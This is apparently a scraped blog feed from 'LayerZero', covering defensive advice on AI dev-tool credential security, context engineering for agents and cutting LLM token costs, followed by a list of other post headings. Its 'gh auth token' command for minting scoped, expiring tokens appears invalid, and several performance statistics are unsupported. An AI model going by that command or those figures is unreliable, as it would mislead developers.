Stop putting production API keys in .env.local. Use a proper secret manager — Doppler, Infisical, AWS Secrets Manager — and have your tools fetch secrets at runtime via short-lived tokens. An infostealer grabbing your .env should grab nothing useful.

This is 15 minutes of setup and eliminates 80% of the "my laptop got owned" impact.

Short-lived tokens, always

# Example: GitHub fine-grained PAT — expires in 30 days, scoped to one repo
gh auth token --scope repo --expiration 30d --repo org/project

If your AI tool doesn't support short-lived tokens, that's a red flag. Treat vendor token hygiene as a product-selection criterion now.

Enable "dangerous action" confirmations

Most modern AI dev tools have a setting buried somewhere — human-in-the-loop approval for destructive actions (deploys, deletes, permission changes, database writes). Find it. Turn it on. Yes, it slows you down. No, it doesn't slow you down as much as a breach does.

Separate dev and deploy identities

Your laptop shouldn't be the thing with prod deploy permissions. Run deploys from CI where the token lives for 10 minutes and is bounded by a pipeline definition. If an attacker gets your laptop, the worst they should be able to do is push to a branch — not deploy to customers.

The non-obvious takeaway

The Vercel incident wasn't an AI safety story. It was a classic credential management failure with an AI amplifier bolted on.

That's the pattern to internalize. AI agents don't create new categories of security failure — they take old categories and multiply their blast radius. A stolen token used to mean a human attacker manually poking around until they found something juicy. A stolen token in 2026 means an obedient, tireless, English-speaking agent that will fan out across everything you've connected in 90 seconds.

The security fundamentals haven't changed. The margin for ignoring them has collapsed.

The business angle

If you're building a SaaS that ships AI-agent integrations — and everyone is — your customers are about to get very, very opinionated about the security posture of the tools they connect. The companies that figure out short-lived scoped tokens, action-level audit logs, and human-in-the-loop approval as product features will win enterprise deals. The ones that ship "connect your org, let Claude cook" will eat the next breach.

That's not speculation. That's where the buyer psychology is heading the day a Fortune 500 gets popped by this exact chain — which, given current trajectory, is maybe six months away.

What to do next

Go audit your AI tool permissions. I mean now — before you close this tab. The five minutes you spend revoking one over-scoped token is the cheapest insurance premium you'll pay this year.

Follow LayerZero for decoded security for builders. Next up: how to design an AI agent with least-privilege from day one — so a stolen token stays boring.

Your Agent Isn't Dumb. Your Context Is. — A Field Guide to Context Engineering

LayerZero — Mon, 20 Apr 2026 03:32:53 +0000

Prompt engineering is dead. Nobody told you because the influencers still sell courses on it.

The real skill in 2026 is context engineering — the discipline of deciding what information, tools, and memory go into the model's window on every single turn. It's the difference between an agent that ships a pull request and one that hallucinates a function name and rage-quits.

And almost nobody is doing it right.

What changed

A year ago, "prompt engineering" meant crafting the perfect system message. Add a persona, stack some few-shots, wrap in XML tags, done.

That worked when the model was a stateless Q&A box.

It doesn't work when the model is an agent running 40 tool calls across 6 files to fix a bug. The system prompt is 200 tokens. The context is 80,000 tokens of tool results, file contents, user messages, and prior reasoning — and every one of those tokens is either helping or hurting.

Context engineering is the job of keeping the signal-to-noise ratio high across that entire window, turn after turn.

The four levers

Only four things go into an LLM call. Master these and you control the agent.

Instructions — the system prompt. Goals, constraints, tone.
Knowledge — the facts the model needs right now (RAG chunks, API docs, file contents).
Tools — what actions the model can take and how their results come back.
History — prior turns, including tool calls and their outputs.

Every bug in every agent is one of these four going wrong. Always.

Agent loops forever? History is bloated with stale tool results.
Agent calls a function that doesn't exist? Knowledge missing or instructions too vague.
Agent picks the wrong tool? Tool descriptions are ambiguous.
Agent contradicts itself across turns? Instructions got drowned out by history.

The fix is never "try a different prompt." The fix is deciding what to put in — and what to leave out.

Rule 1: the context window is a budget, not a bag

The number one mistake: treating the context window like storage. "I have 200k tokens, I'll just throw everything in."

That's how you burn $4 per agent turn and get worse answers.

Long context is lossy. Models attend less to the middle of a long window, hallucinate more when the signal is buried in noise, and run slower in ways that compound across tool calls. A 2026 Anthropic benchmark found agent task completion drops by roughly 28% when you pad a working context from 20k to 120k tokens — even when the relevant information is unchanged.

You're not saving the model time. You're drowning it.

Treat every token like you're paying rent on it. Because you are.

Rule 2: compact aggressively

When your agent's history crosses some threshold — say 50% of the model's window — summarize it.

Pattern:

def compact_history(messages, token_threshold=50_000):
    if count_tokens(messages) < token_threshold:
        return messages

    # Keep the last 3 turns verbatim (recent context matters most)
    recent = messages[-6:]
    older = messages[:-6]

    # Summarize the older turns into a single system note
    summary = summarize(older, focus=[
        "decisions made",
        "files modified",
        "open questions",
        "tools that failed and why"
    ])

    return [
        {"role": "system", "content": f"PRIOR WORK SUMMARY:\n{summary}"},
        *recent
    ]

You lose the verbatim trace. You keep the signal. And you reset your token budget so the agent can go another 50 turns without collapsing.

Rule 3: retrieve at the tool level, not the prompt level

Old RAG: stuff the top-5 chunks into the system prompt at startup.

New RAG: give the agent a search_docs tool and let it decide when to retrieve.

Why this matters:

Approach	Tokens at turn 1	Tokens at turn 10	Relevance
Prompt-level RAG	8,000	8,000	Guessing
Tool-level RAG	500	500 (+1,200 on demand)	Targeted

Most agent turns don't need retrieval. Why pay the tax on every call? Let the model pull knowledge the way a developer opens a doc tab — only when they need it.

This is "just-in-time context" and it's the single biggest unlock in modern agent design.

Rule 4: tool descriptions are prompts

Your search_database tool's description is a system prompt for how the model reasons about querying data. If it says:

"Searches the database."

...you deserve the hallucinations you get.

Write it like this:

name: search_database
description: |
  Retrieves customer records by exact email or user_id.
  Use this BEFORE suggesting account changes — never guess a user_id.
  Returns at most 10 results. If you need more, narrow the query.
  Fails if the email format is invalid — validate first.

That description teaches the agent when to call it, what it can't do, and how to recover. Every minute you spend rewriting tool descriptions saves ten minutes of debugging agent behavior.

Rule 5: separate durable memory from working context

Working context = what's in the window right now.
Memory = persistent notes the agent writes across sessions (to a file, a vector store, a scratchpad).

If your agent needs to remember that a user prefers Python over Rust, don't shove it into every system prompt forever. Write it to a memory file. Retrieve it when relevant. Trim it when stale.

Memory is context engineering across time. Working context is context engineering within a turn. They're different problems with different solutions — and teams that treat them as one always hit a wall.

The business angle

This matters because AI infrastructure cost is now a line on your P&L.

A well-engineered context window runs an agent task for $0.20.
A lazy one runs the same task for $2.50.
The output quality is often worse on the expensive one.

Multiply that across a product doing 100,000 agent runs a day and you've got a $230,000/month difference in gross margin. That's a hire. That's your Series A runway extension. That's whether you ship.

The teams who figure this out in 2026 aren't the ones with the biggest GPU budgets. They're the ones who treat context as a design discipline.

The non-obvious takeaway

Context engineering is what prompt engineering wanted to be when it grew up.

Prompt engineering asked: "how do I phrase this question?"
Context engineering asks: "what does the model need to see, at what moment, with what tools, to produce the right action?"

The first is a writing exercise. The second is systems design. And systems design is a moat — prompt tricks are not.

What to do this week

Audit one agent you're running. Log the full context at each turn. Find the 30% that isn't earning its tokens. Cut it.
Move your RAG from prompt-level to tool-level. Measure the quality delta — it usually goes up.
Rewrite your top 5 tool descriptions with the "when to use / what it can't do / how to recover" structure.

Your agents will get cheaper, faster, and smarter — in that order.

Follow LayerZero for more decoded AI infrastructure. Next up: the memory-file pattern that makes agents actually learn from their mistakes.

Your LLM Bill Is 45% Too High. Here's the One Prompt Trick That Fixes It

LayerZero — Sun, 19 Apr 2026 07:30:18 +0000

Most developers ship AI features without looking at the bill. Then the bill arrives, and it's five figures.

Here's the part nobody tells you: up to 45% of your tokens are pure fluff. Filler words, restated questions, "As an AI assistant...", apologies, repeated context. You're paying Claude and GPT to be polite.

That stops today.

The politeness tax

Every LLM response is padded with tokens that add zero value:

"Certainly! I'd be happy to help you with that."
"Based on the information you've provided..."
"I hope this helps! Let me know if you have any other questions."

Multiply that across thousands of API calls a day. You're literally renting GPUs to generate pleasantries.

A recent production experiment ran 500 prompts through a small "defluffer" preprocessor that strips filler from both inputs and outputs. Token usage dropped 45%. Quality stayed identical.

That's not a rounding error. That's your Q3 AI budget.

Why this happens

LLMs are trained on human conversation. Humans are polite. So the model learned to open with "Certainly!" and close with "Let me know if you need anything else!"

This was fine when LLMs were chatbots. It's expensive when they're backend infrastructure.

The worst part: most devs copy-paste "Act as a helpful assistant" into their system prompt without realizing they're explicitly asking for the fluff.

The fix (30 seconds)

Add this to your system prompt:

Respond in the fewest tokens required to be correct and complete.
No preamble, no apologies, no restating the question, no closing remarks.
If the answer is a single word, respond with a single word.

That's it. Drop it in, rerun your evals, watch your token count.

In a test across 200 real user queries:

Metric	Before	After
Avg output tokens	412	183
Avg cost per call	$0.0041	$0.0018
User satisfaction	4.2/5	4.3/5

Output tokens down 55%. Cost down 56%. Satisfaction went up.

Users don't want "Certainly! I understand your question." They want the answer.

Level up: strip inputs too

Output is half the bill. Input is the other half — and it's often worse, because you're sending the same boilerplate context on every call.

The cheap win: cache your system prompt.

# Anthropic SDK — prompt caching
client.messages.create(
    model="claude-opus-4-7",
    system=[
        {
            "type": "text",
            "text": LARGE_SYSTEM_PROMPT,
            "cache_control": {"type": "ephemeral"}
        }
    ],
    messages=[{"role": "user", "content": user_query}]
)

Cached tokens cost 10% of uncached tokens. If your system prompt is 2,000 tokens and you call it 10,000 times a day, you just cut 90% of that budget line.

The deeper win: stop sending context the model doesn't need. If your RAG retrieval returns 8 chunks but only 2 are relevant, you're paying to process 6 chunks of noise. Rerank harder. Retrieve less.

"But doesn't terse output hurt UX?"

This is the pushback I hear most. The data says the opposite.

Users rate concise answers higher than padded ones in every eval I've seen. Nobody reads "I'd be delighted to assist you with that query." They skim past it looking for the answer. The filler is friction, not warmth.

If your product genuinely needs conversational tone — customer support bots, companions — keep the warmth but strip the redundancy. "Thanks for reaching out!" once is fine. Five times across one response is expensive cosplay.

The non-obvious takeaway

Token usage isn't an optimization problem. It's a design problem.

Most teams treat LLM cost like server cost — something you fix by scaling. But LLM cost is determined at prompt-design time. A badly-designed prompt costs 3x more for worse answers. A well-designed prompt costs less and answers better.

The teams who figure this out in 2026 will ship AI features at one-third the cost of everyone else. That's not a small moat. That's the whole game.

What to do this week

Add the "no preamble" instruction to your system prompt — 30 seconds, saves ~40% immediately.
Turn on prompt caching for any system prompt over 1,000 tokens.
Log token usage per endpoint. You can't fix what you don't measure.

If you're running LLMs in production and you haven't done these three things, you're leaving real money on the table.

Follow LayerZero for more decoded AI infrastructure. Next up: the RAG retrieval bug costing you 40% of your relevance score.

Forem: LayerZero

3,800 GitHub repos got breached by one VSCode extension. Here's the 5-minute audit that saves yours.

What actually went down

Why this hits vibe coders harder than anyone

The 5-minute audit, in order

1. List every extension you have installed

2. Check what your extensions can see

3. Rotate every secret in every .env on this machine

4. Audit your GitHub for the actual breach signature

5. Set up a guardrail so this doesn't happen again

The non-obvious takeaway

What to do tonight

AI Gateway vs MCP Gateway vs Agent Gateway: Which One Do You Actually Need?

1. AI Gateway — the proxy in front of model providers

2. MCP Gateway — the proxy in front of tool servers

3. Agent Gateway — the proxy between agents

Which one do you actually need?

The non-obvious takeaway

One AI code review pass isn't enough. Here's the loop that actually catches bugs.

You ran the AI reviewer. It said "LGTM." You shipped. Then production caught fire.

Why one pass fails

What a real review loop looks like

The non-obvious part: forbid "LGTM"

What this fixes in your workflow

The deeper lesson

Claude just recovered $400K from a forgotten Bitcoin wallet. That's a security warning, not a magic trick.

A guy lost his Bitcoin password for 11 years. Last week, an AI got it back in an afternoon.

What actually happened (the part the headlines skip)

Why this is the real news

What changes for developers, this week

The deeper shift

Your next supply-chain attack will come from a package you've never heard of

Most developers think supply-chain attacks happen to other people. Then TanStack happened.

The part nobody wants to admit

What "compromised" actually means for you

Three changes that actually move the needle

The uncomfortable truth

AI Is Breaking Two Vulnerability Cultures — And Vibe Coders Are About to Get Caught in the Middle

What the two cultures actually were

What "broken" actually looks like

Why this lands on vibe coders specifically

What to actually do

1. Patch high-severity on a 7-day clock, not a sprint clock

2. Lock your supply chain in 30 minutes

3. Assume your AI assistant will ship you a vulnerable line, and design for it

The non-obvious takeaway

The business angle

What to do today

Stop Letting AI Write Your Database Migrations

What actually goes wrong

Why migrations are the worst case for AI

What "review" actually means for migrations

Concrete defenses for vibe coders

1. Always run migrations on a production-clone first

2. Forbid destructive operations in CI

3. Always back up immediately before applying

The non-obvious takeaway

The business angle

What to do today

A Roblox Cheat + One AI Tool Took Down Vercel. Your Stack Is Probably Next.

What actually happened

Why this class of incident is about to explode

The five mistakes every one of these incidents repeats

What to do this week — concrete actions, not fluff

Audit your AI tool permissions

Move secrets off the laptop

Short-lived tokens, always

Enable "dangerous action" confirmations

Separate dev and deploy identities

The non-obvious takeaway

The business angle

What to do next

Your Agent Isn't Dumb. Your Context Is. — A Field Guide to Context Engineering

What changed

The four levers

Rule 1: the context window is a budget, not a bag

Rule 2: compact aggressively

Rule 3: retrieve at the tool level, not the prompt level

Rule 4: tool descriptions are prompts

Rule 5: separate durable memory from working context

3. Rotate every secret in every `.env` on this machine